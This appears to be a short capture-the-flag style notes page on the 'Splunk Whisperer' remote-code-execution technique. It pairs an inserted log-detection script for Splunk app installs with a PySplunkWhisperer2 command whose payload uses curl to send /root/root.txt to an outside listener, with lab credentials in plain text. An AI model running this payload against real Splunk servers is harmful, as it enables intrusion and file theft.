Splunk Whisperer

rce, devops

Overview

An authenticated attacker can send a malicious package to the Splunk API and have it executed. This can be done remotely or locally.
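A defender-side check for the behaviour described above, as an added example that is not part of the original page: it scans splunkd access-log lines for POST requests to the REST app-install endpoint (`apps/local`). The log layout and the sample lines are constructed for illustration, and `find_app_installs` is a hypothetical helper name.

```python
import ipaddress
import re

# Constructed sample lines modelled on splunkd_access.log (layout assumed).
SAMPLE_LOG = """\
127.0.0.1 - admin [12/Mar/2024:09:14:02.101 +0000] "GET /services/apps/local?count=-1 HTTP/1.1" 200 5120 "-" "Splunk/8.0" - 12ms
192.0.2.44 - opsuser [12/Mar/2024:09:15:40.332 +0000] "POST /services/apps/local HTTP/1.1" 201 1873 "-" "python-requests/2.25.1" - 640ms
127.0.0.1 - admin [12/Mar/2024:09:16:11.007 +0000] "POST /services/search/jobs HTTP/1.1" 201 98 "-" "Splunk/8.0" - 31ms
192.0.2.44 - opsuser [12/Mar/2024:09:17:05.554 +0000] "POST /servicesNS/nobody/search/apps/local HTTP/1.1" 401 130 "-" "python-requests/2.25.1" - 4ms
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
    r'\S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# The collection endpoint itself, with or without a user/app namespace.
INSTALL_RE = re.compile(r'^/services(?:NS/[^/]+/[^/]+)?/apps/local/?(?:\?.*)?$')


def is_remote(src):
    """True unless the source parses as a loopback address."""
    try:
        return not ipaddress.ip_address(src).is_loopback
    except ValueError:
        return True  # hostname or garbage: treat as non-local


def find_app_installs(log_text):
    """Return one record per POST to the app-install endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or not INSTALL_RE.match(m["path"]):
            continue
        hits.append({
            "time": m["ts"], "src": m["src"], "user": m["user"],
            "status": int(m["status"]), "agent": m["agent"],
            "remote": is_remote(m["src"]),
            "accepted": m["status"].startswith("2"),
        })
    return hits


if __name__ == "__main__":
    for hit in find_app_installs(SAMPLE_LOG):
        print(hit)
```

Accepted installs from a non-loopback source, or from a scripted user agent, are the records to review first against the list of apps that were deployed on purpose.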

Using python3 with the local exploit

# The script uses Python 2 syntax; replace these functions for Python 3
raw_input() --> input()
print "some text" --> print("some text")

# Then run the local exploit
python3 PySplunkWhisperer2_local.py --port 8089 --username shaun --password Guitar123 --payload "curl -F 'data=@/root/root.txt' http://10.10.14.26:4444"

References